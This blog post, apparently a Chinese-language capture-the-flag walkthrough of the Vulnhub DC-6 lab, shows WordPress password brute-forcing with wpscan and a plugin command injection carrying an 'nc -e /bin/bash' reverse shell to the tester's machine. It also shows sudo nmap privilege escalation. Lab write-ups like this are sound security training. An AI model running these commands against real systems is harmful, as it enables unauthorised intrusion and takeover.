首页 > 其他分享 >Vulnhub | DC-6

Vulnhub | DC-6

时间:2022-08-24 10:59:52浏览次数:88  
标签:登录 -- DC 密码 wpscan Vulnhub txt wordy

信息搜集

主机发现、端口扫描

 

访问80端口,域名自动解析 ‘wordy’

在本地和kali的hosts文件写入192.168.0.141 wordy

Web渗透

后台爆破

 

用了wordpress的cms

用Kali自带的wpscan工具

wpscan --url wordy -e u

得到五个用户名

 

根据官方提示,生成密码字典

https://www.vulnhub.com/entry/dc-6%2C315/

 

 

 

若没解压需要自行解压,然后开始爆破密码

wpscan --url wordy -U user.txt -P passwords.txt

 

最终得到一个用户名和密码

mark/helpdesk01

访问登录后台http://wordy/wp-admin

漏洞发现

登录后发现有一个插件,可以记录用户信息

 

 

翻了一下都是刚刚爆破失败的日志

搜了一下,是这个插件存在漏洞

抓包修改参数,可以命令执行

 

反弹Shell

方法一

www.baidu.com |nc -e /bin/bash 192.168.0.106 9001

方法二

也可以直接使用msf下的exp

获取一个交互式的Shell

python -c "import pty;pty.spawn('/bin/bash')"

找一找敏感信息,有这4个用户

 

ls -alhR

 

 

通过寻找,找到另一个用户的账号密码

graham/GSo7isUM1D4

SSH成功登录

sudo-l

 

提权

发现jens用户无需密码可以执行sh脚本文件

那修改一下sh文件,然后运行试试

把反弹命令写入脚本当中,kali开启监听

 

 

 

jens可以在无密码情况下使用nmap命令

echo 'os.execute("/bin/sh")' > getShell

sudo nmap --script=getShell

最终flag

cat /root/theflag.txt

 

 

总结

1.信息搜集发现网站cms是wordpress

2.利用wp-scan爆破出后台的登录账号密码

3.进入后台发现历史漏洞,利用漏洞寻找敏感信息

4.发现可登录ssh账号,登录后寻找提权方法

 

标签:登录,--,DC,密码,wpscan,Vulnhub,txt,wordy
From: https://www.cnblogs.com/mlxwl/p/16619035.html

相关文章

  • [Express] Extends CrudController with Mongoose model
    Eachmodelcontroller:import{crudControllers}from'../../utils/crud'import{Item}from'./item.model'exportdefaultcrudControllers(Item)Youareabl......
  • Chapter8. 单bit信号跨时钟域同步CDC
    Chapter8.单bit信号跨时钟域同步CDC本章导图单bit信号慢到快传输对于电平信号快到慢由于电平信号高电平时间足够长,因此直接打两拍避免亚稳态是可以的。对于边沿信号......
  • 世纪互联:IDC产业4.0时代,击穿数字化“破局点”
      如果说互联网是种子,数据是肥料,那么数据中心就是土地。过去的四分之一世纪,技术驱动IDC产业塑造外部形态;来到“分工明确、全方位合作的”产业4.0时代,以构建“客户新......
  • Acrobat Pro DC 2022 for Mac(PDF编辑软件)中文版
    AcrobatProDC2022formac是一款PDF编辑和阅读软件。AcrobatDC可以将任何纸质文件转换为可编辑的电子文件,用于传输、签字,AcrobatDC是全球最佳PDF编辑阅读工具。a......
  • Noob: 1-vulnhub靶场
    环境信息靶机:192.168.124.148攻击机:192.168.124.129打靶过程nmap扫描端口及服务发现开放了21,80,55077端口,且存在ftp匿名访问访问80端口,是一个登录页面ftp匿......
  • linux开机卡死-end tarce dcec58a1576e8cea
    故障表述:因为机房空调其中一台不制冷,机房内温度过高,关闭部分非正式环境的服务器以减少散热。修好空调后,观察半天,没有问题。重新打开前面关闭的linux服务器,发生以下错误:见......
  • 5月最新情报,5MW/11.9MWh系统用大型储能系统上市,以及用于BCP应用的DC耦合的优势介绍
    系统用大型储能系统上市5MW/11.9MWh5MW/11.9MWh大型蓄电池是TAOKEENERGY于2022年4月新上市的一款产品。系统由5MW集装箱式的PCS,32台372.7KWh的水冷电柜,4台直流汇流柜......
  • GridControl自带的导航栏
    1、介绍GridControl自带的导航栏2、用法///<summary>///初始化GridControl///</summary>///<paramname="gc"></param>publicvoidInitGridControl(GridCon......
  • Vulnhub | DC-4
    信息搜集通过mac地址找真实IP地址 真实IP为192.168.0.151,开放端口80,22 爆破密码 访问后是一个登录框,爆破尝试admin/happy访问后是一个登录框,爆破......
  • Vulnhub | DC-2
    靶场地址https://www.vulnhub.com/entry/dc-2,311/信息搜集探查IP这里和DC-1一样因为下载的镜像打开是一个登录界面,无法知道它的IP地址,所以这里需要借助一下VMware的......